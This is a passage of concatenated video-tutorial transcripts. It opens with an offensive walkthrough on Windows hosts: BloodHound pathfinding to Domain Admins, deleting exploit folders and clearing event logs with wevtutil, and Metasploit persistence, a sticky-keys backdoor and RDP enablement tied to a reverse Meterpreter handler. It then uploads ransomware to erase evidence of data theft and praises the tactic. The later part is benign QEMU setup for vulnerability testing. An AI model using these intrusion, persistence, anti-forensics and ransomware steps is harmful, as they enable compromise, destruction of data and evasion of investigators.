logged in, that's perfect. So what I need to do here is I can see that I've already have the information I'm looking for. But if you don't have the information, you can click on Upload Data, select the bloodhound.zip file that you want to open up, click Open, and it is going to import that database into Bloodhound, into that Neo4j database, so that you can explore it. And there's a bunch of different reports here that you can run, but one of the great things is what's called pathfinding. So I want to take that svc-alfresco account. Now this user account I have access to, so I've typed it in, it shows up here, and I want to pathfind it to the domain admins group. So how can I take this user and turn them into a domain admin? Is it possible? How far can I get? So I press enter, and suddenly I see that if I just expand this out, there is a pathway from my user account to get to the domain admin account. So the target is domain admins. So I'm just going to rearrange this a little bit so I can visualize it a little bit better. And I apologize if my machine slows down. It is a virtual machine. It doesn't have a lot of memory. So I start out with my SVC Alfresco account. Now, this account is a member of Service Accounts, which is a member of the Privileged IT Accounts, which is a member of the Account Operators, which has this generic Windows Exchange permission, write DACL access to the local domain. So this account can actually write ACL information to the domain. So I can go back and use PowerView and use the write ACL function to move myself into that domain administrators group. And that would give me domain admin access. And here I can see that gives me a member of the domain admin account. So here I have my connection open. It's a reverse netcat listener on a Windows Server 2016 machine. I've gotten all the information off of it that I want, and now I just want to clear out any evidence that I've been there in the quickest and dirtiest fashion I possibly can. Now, keep in mind there are scripts out there that can do a lot of this for you, and that will automate a good chunk of this task. These scripts do a much better job of cleaning up than what I'm going to show you here, but this is just a very basic way that you can go in and remove some information. So the first thing we have to remember is that we did an exploit on this machine in order to get our netcat listener. And if I type in dir here on the documents folder and press enter, I can see there's a folder called exploit. Chances are I don't want to leave that on the remote machine, so I need to remove it. So we type in rmdir space and the folder name, and that deletes the folder. So if I type in dir for a directory listing again, I can see that it's now missing, which is perfect. Now I need to go to the Windows directory because I want to see the Windows event logs and I want to actually delete them. So I'm going to type in cd space c:/windows/ sysnative /winevt/. Now I'm going to type in dir and press enter, and I can see there's a logs folder. So I'm going to go cd space logs. Now, this works some of the time. This doesn't always work. And the reason why it doesn't always work is because oftentimes the Windows Event Viewer service or the Windows Event Logging service is running on the remote machine you log into. And while it's running, you can't actually delete these files. You have to stop the service first. But if I type in dir and press enter, I can see that I have a bunch of different .evtx files. Now these are the event viewer files for Windows that it pulls up whenever it's going in order to open up the event viewer and view these. So if I wanted to, I could type in del space, let's say I want to remove the setup.evtx. Now, this is likely not going to work because these are 1, protected system files, and 2, it's very likely in use because the service is likely running. Yes, so here we can see it's being used by another process. But on older versions of Windows, this will often work. Plus, you can always use the netstop command to stop that specific service from running. But let's say we did delete that file. That file still exists on the remote machine. We also deleted a folder called exploit, and that still exists in the recycling bin. So how do we empty the recycling bin? The command for that is simple. It's going to be rd space /s space, then we need to do %system drive $recycle.bin. And this is going to clear the recycle bins. Are you sure you want to clear the recycle bin? Yes, I am. Let's get rid of that evidence. So it can't find the file specified right now, but that's because I've actually already cleaned it out earlier, and there's likely nothing sitting in it. So the next step here is I want to show you another way of clearing out the event viewer. So I'm going to go back to the cd c:/windows/ system32. And in here, there's a command. It's WEVTUTIL. And I'm going to put the EL afterwards, and this is going to give me a listing. So what this command does, this is the Windows Event Utility, and I want an event listing. And this is going to list all the different event viewer objects that exist on this local machine. And we can see here I have a bunch of them. And on many servers, you will see there's a lot of them that are application specific to the application you have installed. There's Active Directory ones. There's going to be some for DNS. But there's some that exist on almost every machine that if you're going in to do this quick and dirty, you're going to want to clear out. So I'm going to type in WEVUTIL space CL. And now I want to type in application. And this is going to clear the application log. Helps when I spell it right. WEVTUTIL space CL space application. So it cleared out the application log, and I want to do the same for the security log, and I want to do the same for the system log. WEVTUTIL CL system. So those logs have now all been cleared out. There's going to be nothing left in those log files for the administrator to see. Additionally, for example, let's say I did some stuff with PowerShell. I'll probably clear the Windows PowerShell log. There are scripts out there, like I said, that you can download that exist on GitHub that are going to give you the ability to do this very quickly by running a simple script on the system. Then you can delete that script, clear the recycling bin, and you're good to log off of that machine. So I've exploited a Windows Server 2012 machine. Into it I have a Meterpreter session that's loaded up here that I backgrounded into session 4. What I want to do is create an advanced persistent threat. And I'm going to show you 2 different ways to do this using the MSF console. Keep in mind, there's a lot more than 2 different ways to do this, probably more than 2,000 different ways to accomplish this task. But these are 2 of the simpler ways to do it, so I'm going to walk you through it. So the first one I want to do is type in use, that's USE space EXPLOIT slash Windows WINDOWS slash local LOCAL slash persistence PERSISTENCE. And yeah, I just hit tab there so I could see that I had it spelt right, and I do. So now I want to show options, SHOW space OPTIONS. Now the reason I do this is because I want to see what options I need to set when I'm in this persistence. And I know for a fact that this is showing me the reverse TCP, but it also above it has here the different session information I need to put in. Now this is already set to session 4, which is perfect because that's the Meterpreter session that I want to use here. So what I'm going to do now is I'm going to type in EXPLOIT and I'm going to hit enter. And sorry, my terminal window there just adjusted a little funny, but we can see here that what happened was this actually went and installed autorun on that machine, and it's going to now have a persistent threat on that local machine. That means every time that runs, it's going to try to connect back to my computer, and when it does that, it's going to create a reverse shell. Now, there is another way to do this, and this one isn't as good of a persistent threat, but it is an advanced persistent threat. So we're going to type in use space post. So this is post exploitation slash Windows slash manage slash sticky underscore keys, and hit enter. I'm going to type in show SHOW space options OPTIONS, and here we want to type in set space session space 4 because we want to set it back to that session. This is perfect. All I need to do now is type in EXPLOIT or exploit and hit enter, and it's going to run, and we can see it says sticky keys successfully added. Launch the exploit in RDP or UAC prompt by pressing the shift key 5 times. So what this does is this replaces the stickykeys.exe in the system32 folder with an executable that will actually try to get you a reverse Meterpreter shell. So what you need to now do is somehow kick off the sticky keys command on the remote machine. Now Windows RDP allows you to RDP to a machine without authenticating, so you get the login screen. And when you get that login screen, you can execute sticky keys by pressing the shift key 5 times. And when you do that, that's going to launch that Meterpreter session and give you access to that remote machine. But we're not quite done, because this machine doesn't have everything we need. So we actually need to enable RDP on that machine. So we're going to type in use post slash Windows WINDOWS slash manage MANAGE slash enable ENABLE underscore RDP. We'll press enter, show SHOW space options, and here we can create a user, but what I want to do is I just want to set the session to 4, and I'm going to try to run this without setting a username and password first. Actually, let's create a username. Let's set username to Bob and set password to P@SSW0RD exclamation mark. That should meet the minimum password requirements for that machine. And now we'll type in exploit, EXPLOIT, and press enter, and it tells me RDP is already enabled, which is perfect. That's what I want. So now I know if I try to RDP to this machine, if I press the shift key 5 times, what's going to happen is that's going to open up the sticky keys, and I'm going to be able to get authenticated to it. it's going to be able to open up that reverse Meterpreter shell. Now I'm just going to let this finish here, and then I want to show you how you set up that multi-handler. So that actually failed, but that's because the version of Windows I'm running is a 32-bit one, not a 64-bit. So that was kind of expected that might happen. But what I want to do now is I want to show you how you set up your listener so that you can set up at any time and listen, and whenever that machine is now turned on, it should re-authenticate back and open up your Meterpreter session. So I'm going to type in here, I'm going to type set space payload space Windows / Meterpreter / reverse _ TCP, and then I'm going to type in use space multi / handler, and then I type in exploit, and that's going to open up my reverse TCP handler, and this is going to now allow a remote machine to connect in. If it does connect in, what's going to happen is it's going to open up a Meterpreter session. So I have my Kali machine open. I have a Server 2012 machine that I have an advanced persistent threat on. Now what I want to accomplish here is I want to be able to cover my tracks in the quickest way possible. So one of the things that I've seen as a trend kind of emerging over the past couple of years within organizations that have been hit with ransomware is that the ransomware doesn't actually have a ransom value associated with it. What the attacker did was they got in, they stole some data, they stole the data they wanted, and then to cover their tracks, they simply locked the remote machine up with ransomware. Now, this is brilliant because what it does is it forces you, when you go in to take a look at what had happened, to have to ignore everything on that local machine. So you can only go by network logs and network traces. So you're not 100% sure what data had actually been compromised by the attacker. What's even more brilliant about it is it takes advantage of really a blind spot in a lot of backup policies where backups are simply run nightly or daily on a schedule. So what this does, this creates essentially a 24-hour window where someone can get in, do some hijinks, take some data, and then lock the machine up with ransomware. And then you can't really go in and do a post-mortem on that machine other than saying, yeah, it's locked up with ransomware, this machine's done. And when they go to restore from backup, they have to go to the previous days, and when they restore that backup to restore the system to a functional state, guess what? There's no information there about your attack, so they're really reliant on ensuring that they have good firewall logs or good logs on other systems that would have detected the attack. So what I'm going to do now is I'm going to open up my advanced persistent threat, and then I'm going to launch the ransomware. So I have my Kali machine, the terminal open. I'm going to type in MSF console. MSFCONSOLE. I'm going to press enter. This is going to load into the Metasploit module, and it does take a couple seconds to load on this machine. It's not the most powerful VM, but there we go, we're in. So I'm going to type in use space multi MULTI / handler HANDLER, and I'm going to hit enter, and this is going to load into the multi-handler, which allows me to handle multiple sessions. I type in set space payload, and I'm going to use Windows WINDOWS / Meterpreter METERPRETER / reverse _ TCP. I'm going to type in show space options, and I'm going to set my L host to 192.168.2.30, which is my local machine's IP. I have the advanced persistent threat on the remote machine is set up to use L port 4444, and I'm just going to type in exploit EXPLOIT, and I'm going to hit enter, and this is going to start my reverse handler. And now I'm going to wait for that Meterpreter session to open, and there it is. I have my Meterpreter session. So what I've done actually on that system in testing and in recording these is I've set up 2 different advanced persistent threats. So immediately as soon as I set up the Meterpreter, I get 2 sessions open, which is great. Now you typically wouldn't want that on a remote machine, you'd only want one, but this is great. And if you have multiple machines that you have advanced persistent threats on, when you open up the shell, the multi-handler, it starts listening. You'll see several sessions actually open of any of the machines that are on. But this machine, I want to effectively lock it down. I want to make sure that this machine, no one's going to be able to see what I did on it today. So what I'm going to do here is I'm going to do upload, and type in upload upload/root/downloads, because that's the folder I have my ransomware in, /ransom.exe, and I'm going to output that to ransom.exe on the remote machine. And this is going to upload my ransomware to the remote machine. Now, what this is really neat about this is that I don't actually have to open up a shell or execute any commands directly on the machine to do that. I now have my ransomware loaded. If I type in ls, I could see my ransomware should be there. I should have a ransom.exe. If I go down, it's hidden there. There we go, ransom.exe, and I have full read and write privileges on it. It's been uploaded into the Windows System 32 directory. So now I want to execute it. Now I'm going to execute this, and then the remote machine is effectively going to shut off at some point when the ransomware is done. So type in execute, which is the execute command from interpreter shell, -f ransom.exe. And I'm going to hit enter, and it says process 1144 created. So I'm going to let the ransomware run, and we're going to see what happens here to my interpreter shell if it actually disconnects at some point. So I'm going to pause the video, and I'll come back once that has happened. All right, so it's been a couple minutes now, so if I type in shell, I should not be able to connect to this machine. This machine should now be offline, because chances are it has run the entire ransom, and it should have restarted the remote machine. And the end user, when they come in the morning and take a look at this machine, are going to have to go to backup. There we go. Timeout error, operation timed out. That machine's offline. That machine's now completely locked up by ransomware that doesn't actually have a ransom set. And what's beautiful about it is the actual administrator isn't going to be able to do a full post-mortem of that machine. They're going to have to restore from backup to get their operations back up.
In this video, I'll demonstrate how to set up QEMU and its dependencies for machine emulation and virtualization. It's important to know what types of emulation and virtualization QEMU gives us. The first is full system emulation, which means running an operating system under an emulated processor architecture. Then there's user mode emulation, running Linux or BSD on a supported architecture in user mode. And then full virtualization, running under KVM or Xen for better performance, using hardware-assisted virtual pass-through like AMD-V or Intel's VTX. Since I'm running Ubuntu in this case, I'm going to use apt to install QEMU. I'll type sudo apt install QEMU, QEMU user in case I want to use user mode, and QEMU-system-x86 to install the x86 commands that come with QEMU. Now, you might expect after installing, typing QEMU will show you some command or show you some help, but not in this case. There's no actual QEMU command by itself. But if you type QEMU hyphen, and if you have autocomplete in your shell, like I do in Bash, and you double tab, it gives a list of all of the commands associated with QEMU. The main one we're going to focus on is QEMU-system-x86_64. So this is the x86 64-bit architecture associated with either AMD or Intel's CPUs. And if I type this command, it's actually going to try and run the virtual machine without any settings for this system. And it goes through a startup procedure, and it gives me no bootable device. There's no hard drive associated with it. I'll get into an actual example of launching QEMU in the video titled Launching Linux in QEMU, where I'll launch an instance of Alpine Linux. The next step, after I close this, is to create a disk image. This emulates a storage medium, like a hard disk or SSD drive. This also enables snapshots, and the QEMU VM host treats the drive as a single file. You can create different disk images for each different configuration of an emulated system you're working with. I recommend being specific with the image creation, which I'll get to in a moment. QEMU supports a variety of disk image formats, including VMware's VMDK, VirtualBox, VDI, Hyper-V server formats. However, you tend to work with QEMU's RAW or QCOW format the most, or QCOW2 in this case. Now, the RAW format is exactly what it says, RAW. You can think of it as a flat file itself with no extra features. But it does support holes so that the image can grow to fill the space as needed, and you don't have to pre-allocate all the space, just some of it. Now, the main format you work with is the QCOW2 format. This is a versatile format that also supports encryption and compression, and my rule of thumb is to choose the RAW format for performance-critical scenarios and if I only need a small amount of space. Otherwise, I choose QCOW2. So I can create the image using QEMU-IMG, and you could always do --help to show all of the options available in QEMU image. There are even options to access actual hardware on the host computer, such as the CD drive or hard disks, including the whole partition or virtual mapping to a directory tree. It's quite versatile in this regard, but it's also more dangerous and not generally recommended to map to an actual drive on your host system. Try to keep everything contained within the virtual machine itself, especially if our focus is on testing vulnerabilities and exploits. The basic use of QEMU-IMG is this. So QEMU-IMG or image create-F. So this is the format QCOW2 Alpine-Linux. So this is the image for the virtual machine we're going to create in the video titled Launching Linux in QEMU -3.12.1.QCOW2. And then the size. In this case, it's going to be 4 gigabytes, 4G. And it only takes a fraction of a second to create it. And if I do an ls, let's do ls-l, and we can see Alpine Linux 3.12.1.QCOW2. And it shows the size in bytes. Let's put H in there. So this size is 193K. So it's quite a small image, but it can grow up to 4 gigabytes. We can also use QEMU-IMG info. I spelled Alpine Linux wrong. It shows me the format. Alpine Linux 3.12.1.QCOW2, the format, the virtual size, the disk size, the cluster size, and the information. So it's QCOW2 version 1.1, and it gives me some information, corrupt false, which is very important. And now I can rename the image, so when I use it in the future, I won't run into this problem. I'll do move Alpine Linux to Alpine Linux 3.12.1.QCOW2. And that concludes this demonstration of setting up QEMU in Ubuntu Linux. In this video, I'll demonstrate how to launch an instance of Alpine Linux within a QEMU environment. Alpine Linux is a small and lightweight distribution, which makes it easy to demonstrate the install process for QEMU, but this process works with any flavor of Linux. It comes with the Musel's libc library and not the GNU libc or glibc, which is common in other Linux distributions. But alternate libraries can be installed in Alpine Linux if that's what you need to test. It also comes with BusyBox, which provides a number of common Unix utilities. This also fits the lightweight nature of Alpine Linux. So I've opened Mozilla Firefox to alpinelinux.org/downloads. I'll scroll down the downloads section, and there's a number of different variants. There's the standard, extended, netboot, Raspberry Pi, generic ARM, mini root file system, virtual, and Zen. For our purposes, I'm just going to download the virtual variant. So it's similar to standard, but it's a slimmed down kernel optimized for virtual systems, like QEMU. I'll select x86-64. I'll save this file. Once those have been downloaded, I'll switch over to my terminal window. In my downloads folder, do an ls, and I see that I have Alpine Virt 3.12.1-x86_64.iso and the corresponding SHA-256 file. I'll verify the checksum using SHA-256 sum -c Alpine Virt 3.121 x8664.iso.sha256, and it says that it's okay. So what it does is take the SHA-256 of the ISO and verifies it with the SHA-256 digest that's in the file to make sure that the file is correct and hasn't been tampered with. Now, cp Alpine Linux ISO ... documents, so I'm going to put it in the documents folder and cd into documents, ls folder. I have the QCOW image that was created in the video titled Setting Up QEMU and the Alpine ISO that was just downloaded. Now I can run QEMU system x8664-m1g for our memory, -nic user, which I'll explain in further detail in the video networking under QEMU, -boot d. So this is going to set the boot order to boot from the CD-ROM or the ISO image first. So we specify that as a CD-ROM, so -CD-ROM Alpine vert 3121x8664.iso -HDA for our hard drive Alpine Linux QCOW2. So this launches our virtual machine in its own window, and it will boot from the ISO image. Now, it'll take a few moments to load the image and start the boot process, and we should be on our way. Now it asks me for a login. Before I type the login, I'm going to go into View and say Zoom Out so it actually fits on the screen, because the screen size height is shorter. It's only 720. And the default for QEMU is 768. So I'll make it a little bit smaller. The login, the default login is root with no password. And the first thing we need to do with Alpine Linux is run setup-alpine. And it asks for the keyboard layout, which in my case is US, and the variant is US. Asks me for a name. I'll call it Alpine 1. ETH0 for the network, DHCP. Do you want to do any manual network configuration? No. Specify a password for root. Leave the time zone as UTC. It asks me for a mirror to fetch files from Alpine Linux from the repositories. I'm just going to leave it as the default. SSH server, OpenSSH is fine. And now it asks me which disks you would like to use. So the one I've created for this, the QEMU hard disk, is SDA. How would you like to use it? Sys for the entire system on this disk. And we erase what's on there. There shouldn't be anything at the moment. It's the first time using this image. Installation is complete. Please reboot. So I type reboot. This will reboot our Alpine Linux and the installation will be done. I'll just hit X to close it, shut it down. At this point, I want to restart it with the same settings except for the boot settings. Memory 1 gig, -nic user, and then just Alpine Linux, the QCOW2 file. So we'll boot from the image directly, ignoring the CD-ROM, ignoring the ISO, because we've already installed using it. Instead of the reboot, I should have done a power off and then restarted it without the CD-ROM, without the ISO image. The output window does get cut off at the bottom of my screen. I'll change the view to zoom out so we can see the bottom of it. And now we have a login. I'll type root and the password that I set. And now we're in Alpine Linux inside of our QEMU virtual machine. I'll type uname -r and we can see the version of the Linux kernel we're running, 5.4.72. -0 vert. And to get out of QEMU or to close down the virtual machine, we can type power off. And now we have a configured and running virtual machine running Alpine Linux for QEMU. And that concludes this demonstration of launching Linux in QEMU. In this video, I'll demonstrate how to mount the QEMU virtual drive so you can copy files into and out of a QEMU virtual machine. The facility we're going to use for this is called a network block device, or NBD. So it's usually used for mapping or connecting to a hard drive from one machine to another. And it's perfect for attaching to a drive of a virtual machine that's on our local system already. In my current folder, I have the Alpine Linux 3.12.1 QCOW2 drive image. The first thing we need to do is make sure that Alpine Linux is not running. So we're not running QEMU, and this virtual image is not active. The only safe way to do this is to make sure the machine is powered down. Then we get access to the drive. Then we can copy files into it and out of it, then unmount and disconnect from the drive, and then relaunch QEMU, and the changes will be there. The files will be on the drive. To start, I need to do a mod probe, so sudo mod probe nbd max part equals 16. Then QEMU -end bd -c /dev/nbd0, then Alpine Linux 3.12.1.QCOW2. So this will create our disk image as a device, and again, we need to run these commands using sudo, and then sudo part probe /dev/nbd0. And this will check the partitions or probe the partitions of our drive. And then we can use fdisk-l to list the partitions on /dev/nbd0. And I need to remember to run this as sudo. And the main partition we have, or there's three partitions. The first one is our boot partition. The second one is a swap partition. And the third one is the main Linux partition, which is 2.9 gigabytes in size. All I have left now is to mount it. But before, I need to make sure I have a mount point, in this case, a folder to contain the mount, and I've called it alpine-volume. So I'll type sudo mount /dev/nbd0p3, corresponding to the partition we'd like to mount, then alpine volume. Now I can do ls alpine volume, and it shows the entire directory tree inside of our volume. We can look in something, we might be interested in the log files, so I do alpine volume /var/log, and we can see the log files. If we need to copy them out of the drive, we can copy them to our local system. But a very important point here is that we shouldn't start QEMU when the drive is mounted. Now, I believe in this current version of QEMU, it won't allow us to start the virtual machine if it's mounted, but all the same, we need to do sudo umount alpine volume, and then sudo QEMU -nbd -d /dev/nbd0. So we delete or disconnect. The network block device is disconnected. And if I do ls alpine volume, there's nothing in there now. So it's unmounted and disconnected, and we no longer have access to the files, and we're safe to restart the QEMU virtual drive. And that concludes this video on mounting file systems from QEMU virtual drives. In this video, I'll demonstrate how to compile a version of the Linux kernel. This can be a very important step when testing for vulnerabilities in particular versions of the Linux kernel. What I've done is, in my browser in Firefox, I've browsed to a download location for the Linux kernel source for version 5.x. So this is at cdn.kernel.org/pub/linux/kernel/b5.x. And in this, it has information about all of the changes for each minor version of Linux 5 and above. And what I'd like to do is select one of the versions. So I've scrolled down to Linux 5.9.1.tar.gz, tar.sign, and tar.exe. To download the source, I can download it with a gzip or xzip. So I'll download the XZ variant because it's smaller. It's only 110 megabytes. It's more compressed than the GZ version, so it's a little smaller to download. So I'll click on it. It should shortly give me an option to save the file. That'll save to my downloads folder. And I'd also like to download the sign file so we can verify the signature. So I want to save this page into my downloads. So when these files finish downloading, they'll be in my downloads folder. So I'll tab over to my terminal window, and I'm in my downloads folder. I'll run ls, and we have our files, Linux 591 tar.sign and Linux 591 tar.xz. Now before I unzip the file and check the signature, I'm going to install gpg2, sudo apt install gpg2. I'm going to use this to verify the signature, and I believe it's in GP. So for this, I need to do sudo apt install gnu pg2. And now I can type gpg2 --locate keys Torvalds at kernel.org and Greg KH at kernel.org. So these are the two maintainers that will have signed. So the kernel will be signed with one of these keys, and we can verify that using their public keys. Now I'll unzip unxz our Linux 591 tar.xz file. I'll verify using gpg2 --verify Linux 591.tar.sign. Now, it does show that it's a good signature from Greg KH, but it shows me a warning. This key is not certified with a trusted signature. There's no indication that the signature belongs to the owner. So what I'll do is I'll copy the key from Greg. So key 38DBBD from the previous output, I'll type in gpg2 --tofu -policy, and I'll paste that part of the key in. And now gpg2 --trust model tofu --verify Linux 591.tar.sign. And now it looks good. So we verified it and no more warning messages. Now we need to extract our tar file. So tar-xf. This will extract it here in downloads in the Linux folder, but that's fine. So I'll do ls and then cd into Linux 591. So we're into this folder. Before we compile, we also need some dependencies. So the main dependencies that we need, I can get using sudo apt install. The first is build essential, then lib ncurses -dev, bison, the general purpose parser, flex for our lexer. So these are all the language things we need for compiling C, and libssl-dev, libelf-dev. So these are the recommended packages we need to install before we can compile our Linux kernel. The next step is to make menu config, and this lets us configure how we want it to be built. Now, unless we have some specific options we need to set or unset, what I recommend is just going with the default, at least the first time you compile it, and then write the config and exit. The next step is likely to take a few hours. So what I'm going to do is kick off the make, and through the magic of video editing, I'll accelerate the process and come back and record the remainder of the video after the compilation completes. So the compilation completes without any error, and at this point we have our Linux binaries of this kernel. If we're going to install the kernel in our current system or our current virtual machine, we would run sudo make modules_install and sudo make install. Otherwise, if we're going to install and boot this kernel in a virtual machine such as QEMU, we need to make an ISO image of it, and we can do that using make ISO image. There's also another parameter, -j, followed by a number, usually 2 or 4 or 8, depending on the number of cores or threads that you can run in parallel on the system to speed up the compilation. And it's a good option to specify when you're making the build. So -j2 or -j4 or 8 usually speeds up the compilation by quite a lot. I'm going to leave that off for now and just make ISO image. Now, for the sake of this video, I'm not going to wait till this completes, but you can verify it for yourself and check inside of the Arch x86-64 boot folder, and you should see the ISO image, the file with the extension ISO, that can be used to boot into a QEMU virtual machine. And that concludes this demonstration of compiling Linux kernels. In this video, I'll demonstrate how to configure some important networking options in a QEMU virtual environment. There are a number of different options, but there are two that are the most appropriate for testing vulnerabilities. The first method is no networking, a valid choice when testing for vulnerabilities or reproducing exploits. Isolate the VM as much as possible and cut it off from accessing the network. This is not the default option in QEMU, so we have to specify it. I'll launch QEMU with no networking. So QEMU system -x8664-m1g, then -nic for network interface card, none. So no network card. And then -hda. And then I specify Alpine Linux, the QCOW2 disk image that we can boot from. So this is going to boot with no network interface. And we can verify that once the VM starts. Now that the VM is booted, I'll log in as root and type ifconfig. And the only interface is the loopback interface. So there's no actual network interface. And when it was booting, at a point in the boot process, it shows starting networking, it shows LO, OK. And then when it attempts to configure ETH0, the Ethernet 0 network interface, it says IP IOCTL failed, no such device, and there's a double exclamation mark when it tries to initialize it, but it can't because we didn't assign one. Now I can run power off from the VM, and we can move on to the second method. This is the method most often used. It's user mode networking. This is the default if you don't specify anything. It uses a local or built-in DHCP server, and it assigns the IP address locally, and it uses IP masquerading on the host to be able to connect to the outside world. And this is, again, taken care of by QEMU. So for this, I'm going to arrow up to reproduce the last command, but on the option -nic, I'm going to remove none and change this to user. So we'll go through the boot process again, and once it completes, I'll log in and test that we can connect to the outside world through the virtual machine. Now, even in the startup, when it initializes ETH0, we can see that it does get an IP address. And if I log in as root and type ifconfig, I do get an Ethernet interface with an IP address assigned locally. And now we can test that we can connect to an outside address. I'll test an address on the local network, the actual gateway, the router on the network, by using ping of 192.168.2.1, and it does get a response. Let's check something else. Let's do a wget of example.com. So this will check to see if we can connect to the outside internet. And if I type cat of index.html, we should see the contents of the page we downloaded with wget, and we do. So it was able to connect outside to example.com and download the contents of the page. Now I'll do a power off of this instance of the virtual machine and go back to the command line. I'll arrow up to bring up that last command. And where we specify user as the network interface, I'm going to put a comma and then host FWD for host forward equals TCP. So we're forwarding TCP connections, :, from 20022-:22. So this will forward any ports on the local host to port 22 in the virtual machine. This is associated with SSH. So this opens up the virtual machine to the local network through the host computer through port 2022 that gets mapped into the virtual machine. So we'll go through the boot process again. And once it completes, I'll log in and we can test to see that port mapping has worked. Now I'll log in as root, put in my password, and now I'll exit from QEMU, but leaving it running and go back to my host system. I'll launch another terminal window, and now I'll type SSH-p 20022 localhost. And it does make a connection. I'll continue connecting, yes. And it's asking for Steve at localhost password. Now there is no account Steve inside the virtual machine. So I'll cancel that and change this to root at localhost. And it says permission denied, but this is most likely a configuration issue with SSHD. It's very bad practice to allow root logins over SSH, and we can test that. I'll do a cat/etc ssh/sshd_config, and that's probably a little bit too much information to parse. So I'll just take that previous command and do less, and the important command, which is commented out, permit root login, and it says prohibit password. So this means that root cannot log in with a password, but we were able to connect, so that port is indeed open. Either using user mode networking or no networking at all are the most appropriate options for testing vulnerabilities. And this gets us what we need in terms of networking in a relatively safe manner. There are more advanced options using the TUN tap interfaces or a bridged interface, and it's a common case to use, especially when running services that need to be accessed from the outside world. This is not our use case, at least not a common one, and if we're dealing with vulnerable code and the testing of exploits, we want to avoid that configuration. A network bridge also opens the rest of our network to the virtual machine in case we have a vulnerable VM we're testing. That has the potential to attack or affect other computers on the network in some way, so we should protect it and isolate the VM, and stick to no networking or user mode networking at the very most. And that concludes this demonstration of networking under QEMU. In this video, I'll demonstrate how to emulate a different architecture in QEMU to emulate the Alpine Linux ARM variant. Using QEMU, we're not limited to just using the architecture of the host machine when running QEMU. We can also emulate processor architectures such as ARM, MIPS, Spark, PowerPC, and more using QEMU. Regardless of our processor's support for virtualization, if the processor architecture or family of the host differs from that of the virtual emulation, it will be a bit slower. Translating from one instruction set to another can slow things down, sometimes considerably, so keep that in mind when emulating a different architecture. For this demo, I'm going to demonstrate Alpine Linux. So I have my web browser, Mozilla Firefox, open to alpinelinux.org/downloads. And the variant I'm going to use is the virtual variant. Similar to the standard, it's a slimmed down kernel optimized for virtual systems. And I've downloaded the AArch64 variant. So this is the 64-bit ARM variant. Now I'll switch over to my terminal window where I'm in my documents folder and I've run ls to show the files that we're working with. So I've downloaded Alpine Virt 3.12.1-arch64.iso. So this is the install image. I've created two scripts in preparation for this, one called install QEMU arch64 alpine.sh, and the other one start QEMU arch64 alpine.sh. Let's look at the install script first. I'll open this up in nano from the terminal window, so nano of the install script. And this is a small shell script. So I have the shebang for bin sh at the first line. And then I have cp/usr/share/qemu-efi-arch64-uppercase QEMU_efi.fd space /0.img. So this copies the QEMU EFI image or UEFI image that we're going to use as the emulated system's flash. So this comes with QEMU, but we're going to expand its size to be 64 megabytes. So I do that with truncate -s 64 M /0.img. So this will expand it out to 64 megabytes. And then I create an empty image, a second flash image that's a writable image, but it will be empty. So I just call truncate -s 64 M /1.img. Then I create the disk image, QEMU image, create -f qcow2, so it's the qcow2 format, alpine-disk.qcow2 4G. Now the most important part is to run QEMU system arch64. We're running this command with a lot of options. There's a lot we need to specify when we're emulating an ARM system. So it starts out with -M virt for a virtual machine with a CPU-CPU Cortex-A57. The processor we're emulating. -M1G, so 1 GB of memory. Then we need a bunch of virtual devices. The first one, -device, virt.io, net PCI, netdev, net0, ROM file, and double quotes, and then netdev type user, ID equals net0. What this does, creates our emulated device, which will give us a user mode emulated network, which we can communicate with to the outside world. Then -device takes a virt.io BLK PCI. So this is a block device PCI with a drive equal to DRV0. This is for our disk drive. Then -device virt.io RNG -PCI. So we have a random number generator device, so RNG equals RNG0. Then -object RNG-random, file name equals /dev/urandom, ID equals RNG0. So we create an emulated urandom device. Then we create our drives. So -drive format equals qcal2, file equals our alpine disk.qcal, which we've created for this, the 4 GB disk, if equals none, and ID equals DRV0. Then our flash devices, so -drive if equals pflash, format equals raw, file equals flash0.img, read only, and then drive if equals pflash, format equals raw, and then file equals flash1.img, our writable flash. And then device virt.io -scsi, so we need a SCSI device to simulate a CD drive so that we can run our installer from. And this -device SCSI -cd, drive equals CD, and then drive if equals none, ID equals CD. File is our Alpine Virt 3.12.1 ARCH64.iso. And then finally, the last line, I specify -no graphic. Now this is one long continuous command, and I've separated it out on multiple lines by using the \delimiter at the end of each line, so we can continue the line and separate the whole command line by line. So the thing to do now is to test it and do /install QEMU ARCH64 alpine.sh. Now before I run this, I need to make sure that we have run sudo apt install QEMU-system-arm to make sure that we have the QEMU ARCH64 so we can emulate it. And in my case, I've already installed it. But if you tried to run this command, tried to run the install script, it would fail if that was not installed. So now I'll run our install QEMU ARCH64 alpine.sh. So it's going to take a few moments to boot and load the ISO installer, and it presents us with the login. So the default install with the installer, we log in as root with no password and run setup alpine. Now through the magic of video editing, I'm going to fast forward through this setup process, which we have already done in the video launching Linux in QEMU, where I set up Alpine Linux under the x86-64 architecture, but the install process is identical. When we get to the step in the install process where it asks us for available disks or to specify a disk to use to install, we specify the disk shown, the VDA, and the install type is sys. When the installation is complete, it asks us to reboot. But instead of rebooting, we're going to power off and use our start script to restart our image to verify that it was installed correctly. So once I exit from the virtual machine, I'm back at my command prompt on the host machine. I type ls, and there's the Alpine disk qcal2 that now appears in the directory. It's where we've installed the ARCH64 version of Alpine Linux. I'll type nano from our command prompt, start QEMU ARCH64 alpine.sh. And we have a single command here to relaunch our virtual machine, but this time it doesn't specify the SCSI CD drive with the installer image because we've installed it on our disk and we no longer need that CD, that ISO image. In this file, we run QEMU system ARCH64 with all of the same options, -m virt, CPU, Cortex A57, -m1G, And then we proceed to specify all of the same information, except we remove the penultimate line, the second to last line, specifying the ISO image. So we end with no graphic again. Now I'll exit out and run /start QEMU AR64 alpine.sh. It will take us through the boot procedure, and it should bring us into a login. So we get to our login, I specify root, and the password I set during the install process, during the setup process. And once I'm inside, I'm going to test that we can connect to the outside world using wget example.com. And it does save the index.html, and I can type cat index.html, and it shows the contents of that file. So we were able to install, and we have a connection to the outside world, and now we can carry out whatever tests or functions we need to perform with this virtual machine, emulating the ARM architecture. And that concludes this demonstration of how to emulate a different architecture in QEMU to emulate the Alpine Linux ARM variant. In this video, I'll demonstrate how to take and restore snapshots of virtual machines using QEMU Monitor. This is one of the great features we get from virtual machines. There have been so many times that I've said to myself, there, I have a blueprint for a starting point, without having to go through the reinstall each time. I can save the machine in its current state, copy or back up that state to use it as a reference point, then I proceed to test, debug, and make a mess of the configuration in the virtual machine. And even the system gets broken down and in a state of kernel panic, where it won't even boot properly. The ability to tinker, to make a mess of things, and then load the last known good state with a single command is incredibly powerful and a huge time saver. So I'll bring up the command QEMU system x8664 -m1g for 1 GB of memory and -HDA to be Alpine Linux 